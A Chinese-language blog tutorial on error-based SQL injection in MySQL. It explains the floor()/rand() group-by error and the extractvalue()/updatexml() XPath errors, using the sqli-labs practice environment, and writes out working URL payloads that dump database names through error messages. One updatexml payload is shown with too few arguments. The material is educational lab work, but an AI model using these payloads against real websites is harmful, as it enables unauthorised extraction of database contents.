报错注入的姿势

Posted 2021-10-13 web-尚1书_

今天看了看报错注入，写篇博客记录一下思路。

报错注入主要分三种：floor()报错，extractvlaue()报错和updatexml()报错。

floor()是向下取整函数，与之搭配使用的函数有count()函数（计数函数），rand()函数（生成伪随机数函数）。

0x01. floor()报错

报错语句如下，只要执行在数据库版本低于8.0、7.0的版本中执行都会有下面这个错误。

报错语句原型：
select floor(rand(0)*2)x,count(*) from information_schema.tables group by x;

以sqli-lab第五关为例，判断这是单引号闭合，但是在联合查询后发现回显位不显示值，我们考虑盲注和报错注入，这里好像可以用盲注，但我们使用报错注入。

payload放这里：
/?id=1’ union select 1,count(*),concat((select schema_name from information_schema.schemata limit 0,1),floor(rand()*2))as a from information_schema.tables group by a%23

额，要看懂这个payload需要一点点SQL基础,这里就不再赘述了，核心部分在于concat((xxx),floor(rand()*2)) ，这里是把要查询的语句(xxx)和floor(rand()*2)连接在一起输出。

核心分析——让我们来康康究竟是怎么报错的

SQL语句：select floor(rand(0)*2)x,count(*) from information_schema.tables group by x;

floor(rand(0)*2)的规律值：01101…
执行一次后，floor(rand(0)*2)的值为0，要存入，group by后又执行了一次，值为1，所以把1存入了，count为1，再查询值为1时，表中已经有1这个数据，所以count直接+1。
再一次查询值为0的时候，表中只有1没有0，要插入，但是group by执行后查询值又变成了1，表中已经有1了，不能在插入一个相同的记录，所以就会报错。

如何利用floor()报错？

非常简单，只要用concat()把查询语句与floor()函数连接起来就好了.

比如说要查询第一个库名，我们可以这么构造payload(已经测试出联合查询要三列):
/?id=1’ union select 1,count(*),concat((select schema_name from information_schema.schemata limit 0,1),floor(rand()*2)) as a from information_schema.tables group by a%23

之后就可以继续报表名，爆列名，爆字段。

0x02. extractvlaue()报错和updatexml()报错

英文小课堂：
extract：提取
value：值

提一下XML的概念，我简单地认为它与html差不多，不同之处在于XML的标签可以自己定义，不像HTML一样必须要特定的标签。

extractvalue(参数1，参数2)

参数1：xml文档字符串
参数2：xpath格式字符串

该函数主要用来查找并解析xml文档

updatexml(参数1，参数2，参数3)

参数1：xml文档字符串
参数2：xpath格式字符串
参数3：替换字符串

该函数主要用来查找替换并解析xml文档，但是不会保存到数据库

extractvalue()和updatexml()函数报错原理解释：
它们两个函数的报错原理其实都一样，都是因为第二个参数不采用xpath格式的字符导致数据库报xpath格式错误，利用concat()函数把一个特殊字符与xpath连接在一起就可以报错。

用extractvalue()函数查询第一个数据库：
/?id=1’ and extractvalue(1,concat(0x7e,(select schema_name from information_schema.schemata limit 0,1)))%23

用updatexml()函数查询第一个数据库：
/?id=1 ’ union select updatexml(1,concat(0x7e,(select schema_name from information_schema.schemata limit 0,1)))%23

同样的，之后就可以继续报表名，爆列名，爆字段。